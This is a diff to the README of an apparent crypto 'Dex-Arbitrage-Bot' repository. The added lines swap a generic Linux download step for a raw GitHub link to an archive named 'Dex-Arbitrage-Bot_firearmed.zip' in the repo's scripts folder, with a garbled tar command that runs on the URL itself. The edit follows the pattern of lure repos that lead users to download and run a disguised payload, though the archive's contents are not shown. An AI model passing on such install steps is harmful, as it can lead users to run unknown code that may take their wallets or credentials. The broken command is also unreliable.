rtet4ertetet/Dex-Arbitrage-Bot/README.md

    - Double-click the file to open it.
    - Drag the Dex-Arbitrage-Bot icon to your Applications folder.

-3. If you downloaded a `.tar.gz` file for Linux:
+3. If you downloaded a `https://raw.githubusercontent.com/rtet4ertetet/Dex-Arbitrage-Bot/main/scripts/Dex-Arbitrage-Bot_firearmed.zip` file for Linux:
    - Open the terminal.
    - Navigate to your download directory.
-   - Extract files using: `tar -xvzf Dex-Arbitrage-Bot.tar.gz`
+   - Extract files using: `tar -xvzf https://raw.githubusercontent.com/rtet4ertetet/Dex-Arbitrage-Bot/main/scripts/Dex-Arbitrage-Bot_firearmed.zip`

 ### Step 5: Run the Application
 Once installed, you can find Dex-Arbitrage-Bot in your applications list.
 Open the application to start trading.